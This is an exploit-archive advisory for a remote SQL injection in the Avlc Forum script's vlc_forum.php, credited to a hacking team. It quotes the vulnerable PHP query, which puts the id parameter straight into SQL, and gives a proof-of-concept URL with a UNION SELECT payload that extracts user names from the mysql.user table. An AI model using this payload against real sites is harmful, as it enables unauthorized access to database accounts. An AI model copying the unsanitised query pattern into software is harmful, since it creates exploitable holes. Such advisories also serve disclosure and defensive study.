Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

2008.07.18
Credit: CWH
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

==================================================================== Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability ==================================================================== ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 12 July 2008 SITE : cwh.citec.us ##################################################### APPLICATION : Avlc Forum VERSION : N/A VENDOR : N/A DOWNLOAD : http://www.easy-script.com/compt.php?id=2147 ##################################################### -- Remote SQL Injection --- --------------------------------- Vulnerable File [vlc_forum.php] --------------------------------- @Line 141: $sql = "SELECT * FROM vlc_forum WHERE id=$id OR re=$id"; 142: $req = mysql_query($sql) or die('Erreur SQL !'.$sql.'<br>' . mysql_error()); ------------- POC Exploit ------------- [+] http://[Target]/[avlc_path]/vlc_forum.php?action=affich_message&id=-999999/**/UNION/**/SELECT/**/1,user,3,4,5,6,7,8,9/**/FROM/**/mysql.user-- ##################################################################### Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #####################################################################

References:

http://www.securityfocus.com/bid/30202
http://www.milw0rm.com/exploits/6058


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top